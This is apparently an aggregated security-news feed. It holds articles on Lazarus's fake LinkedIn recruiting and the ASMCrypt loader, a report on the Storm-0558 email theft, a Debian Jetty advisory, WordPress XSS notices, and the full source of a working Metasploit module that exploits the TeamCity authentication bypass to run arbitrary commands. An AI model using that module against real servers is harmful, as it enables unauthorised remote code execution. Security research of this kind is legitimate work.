By Deeba Ahmed
Previously, when the group exploited LinkedIn, it managed to pilfer a staggering $625 million from the Ronin Network (RON) blockchain network.
This is a post from HackRead.com Read the original post: Lazarus APT Exploiting LinkedIn to Target Spanish Aerospace Firm

****_KEY FINDINGS_****

*   **An aerospace firm in Spain is the target of an organized attack where scammers contact the company’s employees as recruiters from LinkedIn.**

*   **The activity is attributed to Lazarus as part of its Operation DreamJob campaign.**

*   **The targets are lured into opening a file masqueraded as a coding challenge/quiz, but it is a malicious executable.**

*   **Attackers have used DLL side-loading to deliver payloads and employed four execution chains.**

*   **LightlessCan backdoor is the highlight of this attack, as it can evade detection from real-time security monitoring software and even scrutiny from cybersecurity experts.**

*   **LightlessCan is the predecessor of Lazarus’ signature RAT BlindingCan.**

ESET Research has published a report describing a newly detected cyberespionage campaign from the Lazarus group. The report, authored by Peter Kálnai, revealed that Lazarus APT is exploiting the professional social networking platform LinkedIn in this campaign, which ESET believes is a part of the group’s Operation DreamJob.

Reportedly, the attackers are luring employees of a Spanish aerospace firm by impersonating recruiters from LinkedIn. Their targets are company employees using corporate computers for personal purposes. ESET’s primary discovery was that Lazarus used a previously undocumented backdoor in this campaign, dubbed LightlessCan.

It is noteworthy that since 2019, the Lazarus Group has displayed significant interest in the space industry. In November 2019, the group targeted the Indian space agency, coinciding with the country’s Chandrayaan-2 moon landing attempt.

The use of LinkedIn to target large firms is not new for the North Korea-based Lazarus group. In July 2022, it was revealed that the group used fake LinkedIn job offers to steal $625 million from the Ronin Network (RON), a blockchain network that underpins the popular crypto game Axie Infinity and Axie DAO.

Further probing into this new LightlessCan revealed that it is currently in its evolutionary phase and is a complex tool exhibiting highly sophisticated mechanisms in its design and operation. This indicates that threat actors continually advance their attack tactics and tools since LightlessCan is much more malicious than its predecessor, BlindingCan.

Initial access to the company’s network was achieved in 2022 through a spearphishing attack where the attackers masqueraded as Meta recruiters. They contacted the employees through the LinkedIn Messaging feature. The victim receives two coding challenges to complete the hiring process. This challenge has to be downloaded and executed on a company computer.

(Credit: ESET)

The first challenge is to display the phrase “Hello World!” The second challenge is printing a Fibonacci sequence where each number is the sum of the earlier two numbers. The victim is expected to self-compromise the system by luring them into executing a trojanized PDF viewer to view the job offer or connect with a trojanized SSL/VPN client that comes with an IP address and login credentials.

According to ESET, Multiple employees were targeted with this technique. The targets are requested to prove their proficiency in C++ programming by completing the challenge/quiz. The recruiter sends two executables titled Quiz1.exe and Quiz2.exe. These executables are delivered via two image files (Quiz1.iso and Quiz2.iso). These files are hosted on a third-party cloud storage platform and are basic command-line applications requiring user input.

During the final stages of the attack chain, the attacker infects the system with an HTTP(S) downloader, NickelLoader to deploy any program into the infected system’s memory.

Through NickelLoader, they deliver two RATs, the Lazarus’ flagship toolkit BlindingCan backdoor’s simplified version miniBlindingCan and the new tool ESET named LightlessCan. This is BlindingCan’s successor that supports up to 68 different commands and is indexed in a custom function table. 

(Credit: ESET)

There are two versions of LightlessCan detected by ESET. The current version (1.0) supports only 48 commands with limited functionality. It is based on BlindingCan source code with certain indexing changes.

This new toolkit can mimic the functions of several native Windows commands, e.g. ping, ipconfig, systeminfo, sc, net, enable discreet execution within the RAT, and feature enhanced stealthiness that makes detecting/analyzing it a huge challenge.

Victor Acin, KrakenLabs Manager at Outpost24 commented on the issue and told Hackread.com that “As companies increase their cybersecurity capabilities, modernize their infrastructure, and consolidate their technology, it becomes more and more difficult to exploit vulnerabilities in the traditional way. This, as well as finding faults within the application logic and its programming that allow an attacker to gain access to that server, makes zero-days rare.”

Acin added “It’s not a surprise that threat actors resort to attacks that target the weakest component of the link – the user behind the screen. Social engineering attacks are the most common way to gain access to companies, and with the abundance of data about the employees from sources such as social media to leaks containing PII, it becomes simpler every day to put together a credible target package.”

For your information, Lazarus, aka Hidden Cobra, is a cyberespionage group from North Korea. It was first detected in 2009 and has successfully conducted several high-profile incidents, including the Sony Pictures Entertainment hack (2016) and the WanaCryptor aka WannaCry attack (2017).

Aerospace firms aren’t unusual targets for North Korea-sponsored APT groups like Lazarus as they want to access sensitive technology and gain money from cyberattacks to further the development of North Korea’s missiles.

****_RELATED ARTICLES_****

1.  North Korean Hackers Targeting Banks Globally: Report
2.  South Korea Blames North Korean Hackers For Stealing Bitcoin
3.  Hackers steal personal details of 1,000 North Korean Defectors
4.  South Korean subway system hacked, North Korea a possible culprit
5.  Elite North Koreans aren’t opposed to exploiting internet for financial gain

Lazarus APT Exploiting LinkedIn to Target Spanish Aerospace Firm

Threat actors are selling a new crypter and loader called ASMCrypt, which has been described as an "evolved version" of another loader malware known as DoubleFinger.
"The idea behind this type of malware is to load the final payload without the loading process or the payload itself being detected by AV/EDR, etc.," Kaspersky said in an analysis published this week.
DoubleFinger was first

Threat actors are selling a new crypter and loader called **ASMCrypt**, which has been described as an "evolved version" of another loader malware known as DoubleFinger.

"The idea behind this type of malware is to load the final payload without the loading process or the payload itself being detected by AV/EDR, etc.," Kaspersky said in an analysis published this week.

DoubleFinger was first documented by the Russian cybersecurity company, detailing infection chains leveraging the malware to propagate a cryptocurrency stealer dubbed GreetingGhoul to victims in Europe, the U.S., and Latin America.

ASMCrypt, once purchased and launched by the customers, is designed to establish contact with a backend service over the TOR network using hard-coded credentials, thereby enabling the buyers to build payloads of their choice for use in their campaigns.

"The application creates an encrypted blob hidden inside a .PNG file," Kaspersky said. "This image must be uploaded to an image hosting site."

Loaders have become increasingly popular for their ability to act as a malware delivery service that can be utilized by other threat actors to gain initial access to networks for conducting ransomware attacks, data theft, and other malicious cyber activities.

This includes players new and established, such as Bumblebee, CustomerLoader, and GuLoader, which have been used to deliver a variety of malicious software. Interestingly, all payloads downloaded by CustomerLoader are dotRunpeX artifacts, which, in turn, deploys the final-stage malware.

"CustomerLoader is highly likely associated with a Loader-as-a-Service and used by multiple threat actors," Sekoia.io said. "It is possible that CustomerLoader is a new stage added before the execution of the dotRunpeX injector by its developer."

Bumblebee, on the other hand, reemerged in a new distribution campaign after a two-month hiatus towards the end of August 2023 that employed Web Distributed Authoring and Versioning (WebDAV) servers to disseminate the loader, a tactic previously adopted in IcedID attacks.

"In this effort, threat actors utilized malicious spam emails to distribute Windows shortcut (.LNK) and compressed archive (.ZIP) files containing .LNK files," Intel 471 said. "When activated by the user, these LNK files execute a predetermined set of commands designed to download Bumblebee malware hosted on WebDAV servers."

The loader is an updated variant that has transitioned from using the WebSocket protocol to TCP for command-and-control server (C2) communications as well as from a hard-coded list of C2 servers to a domain generation algorithm (DGA) that aims to make it resilient in the face of domain takedown.

In what's a sign of a maturing cybercrime economy, threat actors previously assumed to be distinct have partnered with other groups, as evidenced in the case of a "dark alliance" between GuLoader and Remcos RAT.

While ostensibly advertised as legitimate software, a recent analysis from Check Point uncovered the use of GuLoader to predominantly distribute Remcos RAT, even as the former is now being sold as a crypter under a new name called TheProtect that makes its payload fully undetectable by security software.

UPCOMING WEBINAR

Fight AI with AI — Battling Cyber Threats with Next-Gen AI Tools

Ready to tackle new AI-driven cybersecurity challenges? Join our insightful webinar with Zscaler to address the growing threat of generative AI in cybersecurity.

Supercharge Your Skills

"An individual operating under the alias EMINэM administers both websites BreakingSecurity and VgoStore that openly sell Remcos and GuLoader," the cybersecurity firm said.

"The individuals behind these services are deeply entwined within the cybercriminal community, leveraging their platforms to facilitate illegal activities and profit from the sale of malware-laden tools."

The development comes as new versions of an information stealing malware referred to as Lumma Stealer have been spotted in the wild, with the malware distributed via a phony website that mimics a legitimate .DOCX to .PDF site.

Thus, when a file is uploaded, the website returns a malicious binary that masquerades as a PDF with a double extension ".pdf.exe" that, upon execution, harvests sensitive information from infected hosts.

It's worth noting that Lumma Stealer is the latest fork of a known stealer malware named Arkei, which has evolved into Vidar, Oski, and Mars over the past couple of years.

"Malware is constantly evolving, as is illustrated by the Lumma Stealer, which has multiple variations with varying functionality," Kaspersky said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cybercriminals Using New ASMCrypt Malware Loader Flying Under the Radar

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 22 and Sept. 29. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for September 22 to September 29

By Deeba Ahmed
Chinese hackers have struck again!
This is a post from HackRead.com Read the original post: Chinese Hackers Stole 60,000 US State Department Emails from Microsoft

Thousands of emails belonging to the US State Department were stolen in a data breach targeting Microsoft Outlook accounts.

Chinese hackers are responsible for breaching the security of Microsoft’s cloud-based Exchange email platform, which occurred in May 2023. Apart from stealing tens of thousands of emails from official accounts, the attackers obtained a list of all email accounts belonging to the State Department, Reuters reported.

As reported by Hackread.com, Microsoft revealed the breach in July 2023, explaining that threat actors breached Outlook accounts used by 25 organizations, including the US State and Commerce Departments, and other charges linked to these entities. The tech giant didn’t disclose the names of the impacted organizations and government entities.

The scope of the breach was disclosed at a Senate staff briefing on September 28, 2023. It was revealed at least 60,000 emails belonging to state department officials stationed in the Pacific, East Asia, and Europe were stolen. The compromised accounts mainly belonged to personnel focusing on Indo-Pacific diplomacy.

In a press briefing, State Department’s spokesperson Matthew Miller confirmed the data breach, explaining that “classified systems” weren’t hacked in that incident. Miller also added that the department is yet to make an attribution, but there’s no reason to doubt Microsoft’s attribution.

“Again, this was a hack of Microsoft systems that the State Department uncovered and notified Microsoft about,” Miller told reporters.

On the other hand, Senator Eric Schmitt said in his official statement that there’s a growing need to “harden” security defences against such intrusions in the future. Moreover, Schmitt believes that the federal government’s dependence on a single vendor should also be reviewed as this could be a weak link.

Microsoft has blamed the Chinese cyber-espionage group called Storm-0558 for the email breach. This group is known for infiltrating email systems of its targets to steal sensitive data.

According to a Microsoft representative, Storm-0558 accessed a Windows crash dump and obtained a consumer signing key, which could be used to compromise Exchange Online and Azure Active Directory accounts. The key was obtained by exploiting an already patched zero-day validation flaw that affected the GetAccessTokenForResourceAPI.

By exploiting this flaw, the attackers could create counterfeited signed access tokens and impersonate any account belonging to their target organizations. With this technique, Storm-0558 compromised the corporate account of a Microsoft engineer and managed to access the government email accounts.

Microsoft has revoked the stolen signing key and launched an investigation into the incident. The company has confirmed no further evidence of repeated unauthorized access to customer accounts using the same access token counterfeiting method.

Upon CISA’s insistence, Microsoft agreed to expand access to cloud logging data, which so far was only available to users having Purview Audit (Premium) logging licenses, free of charge so that network defenders can quickly identify breach attempts.

Mike Newman, CEO of My1Login, has commented on this incident, stating that this attack is crucial because hackers accessed sensitive government data from Outlook.

“Attackers appear to have accessed highly sensitive information in this breach by coupling together a number of attack vectors. These are complex and sophisticated techniques that signal Microsoft was facing a determined adversary that was highly motivated to carry out this attack.”

Newman further noted that encryption is the best defence against such incidents, and the workforce shouldn’t be allowed to access user credentials so that they cannot be lost or solved. Moreover, Microsoft shouldn’t have access to consumers’ private keys in the first place. 

“It should be mandatory for security that customer data (i.e. emails, stored credentials, documents) is encrypted using keys that are only known to the customer, meaning they cannot be accessed by the cloud software provider or an external, malicious actor.”

**RELATED ARTICLES**

1.  Chinese Group Storm-0558 Hacked European Govt Emails
2.  Chinese APT Flax Typhoon uses legit tools for cyber espionage
3.  Chinese Hackers Stole Signing Key to Breach Outlook Accounts
4.  Chinese Hackers Using Stolen Ivacy VPN Certificate To Sign Malware
5.  Chinese APT Slid Fake Signal, Telegram Apps onto Official App Stores

Chinese Hackers Stole 60,000 US State Department Emails from Microsoft

This Metasploit module exploits an authentication bypass vulnerability to achieve unauthenticated remote code execution against a vulnerable JetBrains TeamCity server. All versions of TeamCity prior to version 2023.05.4 are vulnerable to this issue. The vulnerability was originally discovered by SonarSource.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Retry  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'JetBrains TeamCity Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits an authentication bypass vulnerability to achieve unauthenticated remote code execution          against a vulnerable JetBrains TeamCity server. All versions of TeamCity prior to version 2023.05.4 are          vulnerable to this issue. The vulnerability was originally discovered by SonarSource.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF Exploit & Rapid7 Analysis        ],        'References' => [          ['CVE', '2023-42793'],          ['URL', 'https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis'],          ['URL', 'https://blog.jetbrains.com/teamcity/2023/09/critical-security-issue-affecting-teamcity-on-premises-update-to-2023-05-4-now/']        ],        'DisclosureDate' => '2023-09-19',        'Platform' => %w[win linux],        'Arch' => [ARCH_CMD],        'Payload' => { 'Space' => 1024 },        'Privileged' => false, # TeamCity may be installed to run as local system/root, or it may be run as a custom user account.        'Targets' => [          [            'Windows',            {              'Platform' => 'win'            }          ],          [            'Linux',            {              'Platform' => 'linux'            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        # By default TeamCity listens for HTTP requests on TCP port 8111.        Opt::RPORT(8111),        # The first user created during installation is an administrator account, so the ID will be 1.        OptInt.new('TEAMCITY_ADMIN_ID', [true, 'The ID of an administrator account to authenticate as', 1]),        # We modify a configuration file, we need to wait for the changes to be picked up. These options govern how we wait.        OptInt.new('TEAMCITY_CHANGE_TIMEOUT', [true, 'The timeout to wait for the changes to be applied', 30])      ]    )  end  def check    res = send_request_cgi(      'method' => 'GET',      'uri' => '/login.html'    )    return CheckCode::Unknown('Connection failed') unless res    # We expect a TeamCity server to respond with either a "TeamCity-Node-Id" header value or a cookie named "TCSESSIONID".    # In the responses HTML body will be a string containing the release name and build version.    if (res.headers.key?('TeamCity-Node-Id') || res.get_cookies.include?('TCSESSIONID')) && (res.body =~ /(\d+\.\d+\.\d+) $build (\d+)$/)      detected = "JetBrains TeamCity #{::Regexp.last_match(1)} (build #{::Regexp.last_match(2)}) detected."      # The vulnerability was patched in release 2023.05.4 (build 129421) so anything before this build is vulnerable.      if ::Regexp.last_match(2).to_i < 129421        return CheckCode::Vulnerable(detected)      end      return CheckCode::Safe(detected)    end    CheckCode::Unknown  end  def exploit    token_uri = "/app/rest/users/id:#{datastore['TEAMCITY_ADMIN_ID']}/tokens/RPC2"    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(token_uri)    )    # A token named 'RPC2' may already exist if this system has been exploited before and previous exploitation    # did not delete teh token after use. We detect that here, delete the token (as we dont know its value) if required    # and then proceed to create a new token for our use.    if res && (res.code == 400) && res.body.include?('Token already exists')      print_status('Token already exists, deleting and generating a new one.')      unless delete_token(token_uri)        fail_with(Failure::UnexpectedReply, 'Failed to delete the authentication token.')      end      res = send_request_cgi(        'method' => 'POST',        'uri' => normalize_uri(token_uri)      )    end    unless res&.code == 200      # One reason token creation may fail is if we use a user ID for a user that does not exist. We detect that here      # and instruct the user to choose a new ID via the TEAMCITY_ADMIN_ID option.      if res && (res.code == 404) && res.body.include?('User not found')        print_warning('User not found, try setting the TEAMCITY_ADMIN_ID option to a different ID.')      end      fail_with(Failure::UnexpectedReply, 'Failed to create an authentication token.')    end    begin      token = Nokogiri::XML(res.body).xpath('/token')&.attr('value').to_s      print_status("Created authentication token: #{token}")      print_status('Modifying internal.properties to allow process creation...')      unless modify_internal_properties(token, 'rest.debug.processes.enable', 'true')        fail_with(Failure::UnexpectedReply, 'Failed to modify the internal.properties config file.')      end      begin        print_status('Executing payload...')        vars_get = {}        # We need to supply multiple params with the same name, so the TeamCity server (A Java Spring framework) can        # construct a List<String> sequence for multiple parameters. We can do this be enabling `compare_by_identity`        # in the Ruby Hash.        vars_get.compare_by_identity        case target['Platform']        when 'win'          vars_get['exePath'] = 'cmd.exe'          vars_get['params'] = '/c'          vars_get['params'] = payload.encoded        when 'linux'          vars_get['exePath'] = '/bin/sh'          vars_get['params'] = '-c'          vars_get['params'] = payload.encoded        end        res = send_request_cgi(          'method' => 'POST',          'uri' => normalize_uri('/app/rest/debug/processes'),          'uri_encode_mode' => 'hex-all', # we must encode all characters in the query param for the payload to work.          'headers' => {            'Authorization' => "Bearer #{token}",            'Content-Type' => 'text/plain'          },          'vars_get' => vars_get        )        unless res&.code == 200          fail_with(Failure::UnexpectedReply, 'Failed to execute arbitrary process.')        end      ensure        print_status('Resetting the internal.properties settings...')        unless modify_internal_properties(token, 'rest.debug.processes.enable', nil)          fail_with(Failure::UnexpectedReply, 'Failed to modify the internal.properties config file.')        end      end    ensure      print_status('Deleting the authentication token.')      unless delete_token(token_uri)        fail_with(Failure::UnexpectedReply, 'Failed to delete the authentication token.')      end    end  end  def delete_token(token_uri)    res = send_request_cgi(      'method' => 'DELETE',      'uri' => normalize_uri(token_uri),      'headers' => {        'Connection' => 'close'      }    )    res&.code == 204  end  def modify_internal_properties(token, key, value)    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri('/admin/dataDir.html'),      'headers' => {        'Authorization' => "Bearer #{token}"      },      'vars_get' => {        'action' => 'edit',        'fileName' => 'config/internal.properties',        'content' => value ? "#{key}=#{value}" : ''      }    )    unless res&.code == 200      # If we are using an authentication for a non admin user, we cannot modify the internal.properties file. The      # server will return a 302 redirect if this is the case. Choose a different TEAMCITY_ADMIN_ID and try again.      if res&.code == 302        print_warning('This user is not an administrator, try setting the TEAMCITY_ADMIN_ID option to a different ID.')      end      return false    end    print_status('Waiting for configuration change to be applied...')    retry_until_truthy(timeout: datastore['TEAMCITY_CHANGE_TIMEOUT']) do      res = send_request_cgi(        'method' => 'GET',        'uri' => normalize_uri('/admin/admin.html'),        'headers' => {          'Authorization' => "Bearer #{token}",          'Accept' => '*/*'        },        'vars_get' => {          'item' => 'diagnostics',          'tab' => 'properties'        }      )      res&.code == 200 && res.body.include?(key)    end  endend

JetBrains TeamCity Unauthenticated Remote Code Execution

Debian Linux Security Advisory 5507-1 - Multiple security vulnerabilities were found in Jetty, a Java based web server and servlet engine.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5507-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
September 28, 2023                    https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : jetty9  
CVE ID         : CVE-2023-26048 CVE-2023-26049 CVE-2023-36479 CVE-2023-40167  
                 CVE-2023-41900

Multiple security vulnerabilities were found in Jetty, a Java based web server  
and servlet engine.

The org.eclipse.jetty.servlets.CGI class has been deprecated. It is potentially  
unsafe to use it. The upstream developers of Jetty recommend to use Fast CGI  
instead. See also CVE-2023-36479.

CVE-2023-26048

    In affected versions servlets with multipart support (e.g. annotated with  
    `@MultipartConfig`) that call `HttpServletRequest.getParameter()` or  
    `HttpServletRequest.getParts()` may cause `OutOfMemoryError` when the  
    client sends a multipart request with a part that has a name but no  
    filename and very large content. This happens even with the default  
    settings of `fileSizeThreshold=0` which should stream the whole part  
    content to disk.

CVE-2023-26049

    Nonstandard cookie parsing in Jetty may allow an attacker to smuggle  
    cookies within other cookies, or otherwise perform unintended behavior by  
    tampering with the cookie parsing mechanism.

CVE-2023-40167

    Prior to this version Jetty accepted the `+` character proceeding the  
    content-length value in a HTTP/1 header field. This is more permissive than  
    allowed by the RFC and other servers routinely reject such requests with  
    400 responses. There is no known exploit scenario, but it is conceivable  
    that request smuggling could result if jetty is used in combination with a  
    server that does not close the connection after sending such a 400  
    response.

CVE-2023-36479

    Users of the CgiServlet with a very specific command structure may have the  
    wrong command executed. If a user sends a request to a  
    org.eclipse.jetty.servlets.CGI Servlet for a binary with a space in its  
    name, the servlet will escape the command by wrapping it in quotation  
    marks. This wrapped command, plus an optional command prefix, will then be  
    executed through a call to Runtime.exec. If the original binary name  
    provided by the user contains a quotation mark followed by a space, the  
    resulting command line will contain multiple tokens instead of one.

CVE-2023-41900

    Jetty is vulnerable to weak authentication. If a Jetty  
    `OpenIdAuthenticator` uses the optional nested `LoginService`, and that  
    `LoginService` decides to revoke an already authenticated user, then the  
    current request will still treat the user as authenticated. The  
    authentication is then cleared from the session and subsequent requests  
    will not be treated as authenticated. So a request on a previously  
    authenticated session could be allowed to bypass authentication after it  
    had been rejected by the `LoginService`. This impacts usages of the  
    jetty-openid which have configured a nested `LoginService` and where that  
    `LoginService` is capable of rejecting previously authenticated users.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 9.4.39-3+deb11u2.

For the stable distribution (bookworm), these problems have been fixed in  
version 9.4.50-4+deb12u1.

We recommend that you upgrade your jetty9 packages.

For the detailed security status of jetty9 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/jetty9

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmUV6x5fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeTJGw//a9ZVCC9qHUG/KfAkJJs27UGuL4T1hRM5Azu+8jFxMHwuqKf62FCWlGUE  
xM9fwQdUDvfkSBsrGlp+nAwqegOh+YBvAxh6DBdMpEYhZ+wUDLwZaPdR5iTj7q2e  
JpjKs1hp7QRDfguL6+T/sJmMx9zk7soDwqd3QEjBXBhuYhlVfq7Wm4v5STKj28pD  
Yjv6YmLKIHTv9/HaUWNDCFUjyRGZjmAvYVAIF3gNo9Qn2agq4z3+1Z2EPX4+qbVq  
pp+JKr/vVSVHltaR1D0JyC5zjrHOo+dRFWYwG7K/V7kijyIbciNACTe/W2v6hM6F  
w+0+8C7TMbof22nOHVcgBygukIvxdvnG6BQUUQaVeE36wi8cvBSVgTe0NJb0NIQt  
Gr37tlG+9kJy9d02I+hgX8U90aWmaofTJsn3YbAL6wv2r7Klm6LJN6p8oAmqfEM6  
IOOii4JpHaRDz1VQsjskhjw7Q1UigVX6lmx6BfPHzG2BFSe8v5vG+6OvH4oF+Egy  
VTF3U/lvXcdqaZyNnCKn4NWLJZHVYE4ncgdDp8qomJXnDoMy6V9+DEDADiu9C2ox  
4YvtBHVIZ1uYBRRDjutJw0dkKa7QotSlkmVnAV+oqHa1/Dp2Cytjb+rRhp83QLEw  
kfBWYLpFIq9ARI08AyK4hzX27FFf3ojHp++Lau8ODwb/4s9bKE0=j7dG  
-----END PGP SIGNATURE-----

Debian Security Advisory 5507-1

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Ulf Benjaminsson WP-dTree plugin <= 4.4.5 versions.

**Solution**

 No fix

No patched version is available.

Le Ngoc Anh discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WP-dTree Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**Other vulnerabilities in this plugin**

 3 present

 0 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-41662: WordPress WP-dTree plugin <= 4.4.5  - Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in PressPage Entertainment Inc. Smarty for WordPress plugin <= 3.1.35 versions.

**Solution**

 No fix

No patched version is available. No reply from the vendor.

Prasanna V Balaji discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Smarty for WordPress Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**Other vulnerabilities in this plugin**

 2 present

 0 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-41661: WordPress Smarty for WordPress plugin <= 3.1.35 - Cross Site Scripting (XSS) vulnerability - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in I Thirteen Web Solution Photo Gallery Slideshow & Masonry Tiled Gallery plugin <= 1.0.13 versions.

**Solution**

 Fixed

Update the WordPress Photo Gallery Slideshow & Masonry Tiled Gallery plugin to the latest available version (at least 1.0.14).

Found this useful? Thank yuyudhn for reporting this vulnerability. Buy a coffee ☕

yuyudhn discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Photo Gallery Slideshow & Masonry Tiled Gallery Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.0.14.

**Other vulnerabilities in this plugin**

 0 present

 2 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-41658: WordPress Photo Gallery Slideshow & Masonry Tiled Gallery plugin <= 1.0.13 - Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Andreas Heigl authLdap plugin <= 2.5.9 versions.

**Solution**

 No fix

No patched version is available. No reply from the vendor.

Found this useful? Thank Rio Darmawan for reporting this vulnerability. Buy a coffee ☕

Rio Darmawan discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress authLdap Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**Other vulnerabilities in this plugin**

 2 present

 0 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

Tag

#auth